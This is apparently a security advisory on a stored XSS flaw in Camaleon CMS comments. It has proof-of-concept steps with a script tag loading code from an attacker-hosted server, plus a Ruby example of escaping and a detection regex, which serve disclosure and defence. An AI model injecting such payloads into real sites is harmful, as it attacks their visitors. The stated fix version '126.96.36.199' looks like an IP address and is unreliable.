Mend Vulnerability Database
Date: October 20, 2021
Overview
In Camaleon CMS application, versions 0.0.1 to 2.6.0 are vulnerable to stored XSS, which allows an unauthenticated attacker to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.

Details
The “Camaleon CMS” application is affected by a stored XSS vulnerability that allows unprivileged application users to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.

PoC Details
Log in to the application as administrator.
Go to Settings, General Site. Click on the configuration tab and enable the following options:
1. Register comments as approved
2. Allow anonymous comments
Then go to the Post section in the left menu under Contents sections and click All Items to show all the posts. Edit a post by clicking on the pencil icon and then check the “Allow Comments” option to allow comments on the post and click on the Update button.
Now open the application in incognito mode and navigate to the “/sample-post” endpoint to view the post. The option to provide comments can be seen at the end of the post.
As an attacker, create a file “test.js” containing a malicious script such as the one given below, and run a simple Python server to serve the file. Create a new comment with the script given below.
Now any user visiting the post is affected. To confirm it, log in again as administrator, visit the same post, and notice that the admin is affected.

// Command to run the Python Simple Server to host the malicious file:
python3 -m http.server <port_number>

// Create a new comment with the following script:
<script src="http://<attacker_ip>:<port>/test.js"></script>

// Contents of test.js:
alert('XSS');

Affected Environments
Camaleon CMS versions 0.0.1 to 2.6.0

Prevention
Update to camaleon_cms version 126.96.36.199
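
Stored XSS of this kind is addressed by HTML-escaping stored comment text when it is rendered. The Ruby code below is an added example, not code from Camaleon CMS or from this advisory: it renders a constructed comment of the PoC's shape with and without escaping, and flags stored comments worth reviewing after the upgrade. The function names, the sample rows and the host attacker.example are assumptions made for illustration.

```ruby
require 'erb'

# Constructed sample rows standing in for stored comments (not real data).
# The second body has the shape of the PoC comment, with a placeholder host.
COMMENTS = [
  { id: 1, author: 'alice', body: 'Nice post, thanks!' },
  { id: 2, author: 'anonymous',
    body: '<script src="http://attacker.example:8000/test.js"></script>' },
  { id: 3, author: 'bob', body: 'Use x < y && y > z here' }
].freeze

# Vulnerable pattern: stored text is placed in the page as markup.
def render_unsafe(comment)
  "<li><b>#{comment[:author]}</b>: #{comment[:body]}</li>"
end

# Hardened pattern: every stored field is HTML-escaped at output time,
# so the browser shows the text instead of parsing it as a tag.
def render_safe(comment)
  author = ERB::Util.html_escape(comment[:author])
  body   = ERB::Util.html_escape(comment[:body])
  "<li><b>#{author}</b>: #{body}</li>"
end

# Heuristic audit for comments stored before the fix: flags bodies that
# carry script tags, inline event handlers or javascript: URLs.
ACTIVE_MARKUP = /<\s*script\b|\bon\w+\s*=|javascript\s*:/i

def flag_stored_markup(comments)
  comments.select { |c| c[:body] =~ ACTIVE_MARKUP }.map { |c| c[:id] }
end

if __FILE__ == $PROGRAM_NAME
  COMMENTS.each do |c|
    puts "unsafe: #{render_unsafe(c)}"
    puts "safe:   #{render_safe(c)}"
  end
  puts "review comment ids: #{flag_stored_markup(COMMENTS).inspect}"
end
```

The audit pattern is a heuristic for triage and will miss obfuscated markup; escaping at render time is what removes the risk.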

Good to know:
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | None |
| User Interaction (UI): | Required |
| Access Vector (AV): | Network |
| Access Complexity (AC): | Medium |